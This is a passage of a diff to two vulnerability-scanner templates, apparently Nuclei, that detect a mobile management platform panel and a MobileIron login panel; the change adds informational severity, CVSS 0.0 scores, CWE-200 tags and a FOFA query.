name: Mobile Management Platform Panel Detect
name: Mobile Management Platform Panel - Detect
author: ritikchaddha
severity: info
description: Mobile Management Platform panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
verified: true
fofa-query: title="移动管理平台-企业管理"
@ -33,3 +38,5 @@ requests:
group: 1
regex:
- 'version = "(.*)"'
# Enhanced by md on 2022/11/29

9
exposed-panels/mobileiron-login.yaml
View File

@ -1,9 +1,14 @@
id: mobileiron-login
info:
name: MobileIron Login
name: MobileIron Login Panel - Detect
author: dhiyaneshDK,dwisiswant0
severity: info
description: MobileIron login panel was detected.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: panel,mobileiron
requests:
@ -23,3 +28,5 @@ requests:
- type: status
status:
- 200
# Enhanced by md on 2022/11/29

Some files were not shown because too many files have changed in this diff Show More